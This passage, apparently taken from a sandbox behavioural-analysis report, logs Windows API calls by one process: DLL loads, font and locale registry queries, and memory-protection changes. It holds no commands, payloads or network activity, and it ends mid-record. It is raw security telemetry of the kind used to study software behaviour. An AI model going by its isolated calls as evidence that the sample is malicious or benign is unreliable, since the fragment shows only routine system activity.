"SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "TextShaping.dll" } ], "repeated": 0, "id": 315 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Temp\\TextShaping.dll" } ], "repeated": 0, "id": 316 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\TextShaping.dll" } ], "repeated": 0, "id": 317 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000254" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\TextShaping.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 318 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000258" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000254" }, { "name": "FileName", "value": "C:\\Windows\\System32\\TextShaping.dll" } ], "repeated": 0, "id": 319 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000258" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed6980000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x000ac000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 320 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed69cf000" }, { "name": "ModuleName", "value": "TextShaping.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 321 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" } ], "repeated": 0, "id": 322 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" } ], "repeated": 0, "id": 323 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed69cf000" }, { "name": "ModuleName", "value": "TextShaping.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 324 }, { "timestamp": "2025-11-20 10:58:26,094", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\TextShaping" }, { "name": "DllBase", "value": "0x7ffed6980000" } ], "repeated": 0, "id": 325 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\TextShaping" }, { "name": "BaseAddress", "value": "0x7ffed6980000" }, { "name": "InitRoutine", "value": "0x7ffed69ca790" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 326 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0ef5000" }, { "name": "ModuleName", "value": "gdi32full.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 327 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0ef5000" }, { "name": "ModuleName", "value": "gdi32full.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 328 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00909000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 329 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0090e000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 330 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback" }, { "name": "Handle", "value": "0x00000254" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback" } ], "repeated": 0, "id": 331 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane1" } ], "repeated": 0, "id": 332 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane2" }, { "name": "Data", "value": "SimSun-ExtB" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane2" } ], "repeated": 0, "id": 333 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane3" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane3" } ], "repeated": 0, "id": 334 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane4" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane4" } ], "repeated": 0, "id": 335 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane5" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane5" } ], "repeated": 0, "id": 336 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane6" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane6" } ], "repeated": 0, "id": 337 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane7" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane7" } ], "repeated": 0, "id": 338 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane8" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane8" } ], "repeated": 0, "id": 339 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane9" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane9" } ], "repeated": 0, "id": 340 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane10" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane10" } ], "repeated": 0, "id": 341 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane11" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane11" } ], "repeated": 0, "id": 342 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane12" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane12" } ], "repeated": 0, "id": 343 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane13" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane13" } ], "repeated": 0, "id": 344 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane14" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane14" } ], "repeated": 0, "id": 345 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane15" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane15" } ], "repeated": 0, "id": 346 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "ValueName", "value": "Plane16" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane16" } ], "repeated": 0, "id": 347 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" } ], "repeated": 0, "id": 348 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback" }, { "name": "Handle", "value": "0x00000254" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback" } ], "repeated": 0, "id": 349 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000254" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "4" }, { "name": "MaxSubKeyLength", "value": "13" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "0" }, { "name": "MaxValueNameLength", "value": "0" }, { "name": "MaxValueLength", "value": "0" } ], "repeated": 0, "id": 350 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "MingLiU" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\MingLiU" } ], "repeated": 0, "id": 351 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "MingLiU_HKSCS" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\MingLiU_HKSCS" } ], "repeated": 0, "id": 352 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "2" }, { "name": "Name", "value": "PMingLiU" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\PMingLiU" } ], "repeated": 0, "id": 353 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegEnumKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" }, { "name": "Index", "value": "3" }, { "name": "Name", "value": "SimSun" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\SimSun" } ], "repeated": 0, "id": 354 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000254" }, { "name": "SubKey", "value": "Segoe UI" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Segoe UI" } ], "repeated": 0, "id": 355 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x140056880", "parentcaller": "0x140056880", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" } ], "repeated": 0, "id": 356 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "comctl32.dll" }, { "name": "BaseAddress", "value": "0x7ffecf5a0000" } ], "repeated": 0, "id": 357 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffecf5a0000", "arguments": [ { "name": "lpLibFileName", "value": "comctl32.dll" }, { "name": "dwFlags", "value": "0x00000000" } ], "repeated": 0, "id": 358 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "COMCTL32.dll" }, { "name": "ModuleHandle", "value": "0x7ffecf5a0000" }, { "name": "FunctionName", "value": "RegisterClassNameW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecf625670" } ], "repeated": 0, "id": 359 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000084" }, { "name": "ValueName", "value": "000603xx" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "kernel32.dll" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx" } ], "repeated": 0, "id": 360 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x7ffee1660000" } ], "repeated": 0, "id": 361 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffee1660000", "arguments": [ { "name": "lpLibFileName", "value": "kernel32.dll" }, { "name": "dwFlags", "value": "0x00000000" } ], "repeated": 0, "id": 362 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x7ffee1660000" }, { "name": "FunctionName", "value": "SortGetHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee166a190" } ], "repeated": 0, "id": 363 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x7ffee1660000" }, { "name": "FunctionName", "value": "SortCloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee1680170" } ], "repeated": 0, "id": 364 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000254" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000080", "pretty_value": "FILE_ATTRIBUTE_NORMAL" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 365 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000258" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000254" }, { "name": "FileName", "value": "C:\\Windows\\Globalization\\Sorting\\SortDefault.nls" } ], "repeated": 0, "id": 366 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000258" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x06120000" }, { "name": "SectionOffset", "value": "0x007fef00" }, { "name": "ViewSize", "value": "0x00338000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 367 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000258" } ], "repeated": 0, "id": 368 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000254" } ], "repeated": 0, "id": 369 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000254" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids" } ], "repeated": 0, "id": 370 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000254" }, { "name": "ValueName", "value": "ru-RU" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru-RU" } ], "repeated": 0, "id": 371 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000254" }, { "name": "ValueName", "value": "ru" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "{0000004A-57EE-1E5C-00B4-D0000BB1E11E}" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru" } ], "repeated": 0, "id": 372 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "user32" }, { "name": "BaseAddress", "value": "0x7ffee1f70000" } ], "repeated": 0, "id": 373 }, { "timestamp": "2025-11-20 10:58:26,109", "thread_id": "2188", "caller": "0x14001f23c", "parentcaller": "0x140005850", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": 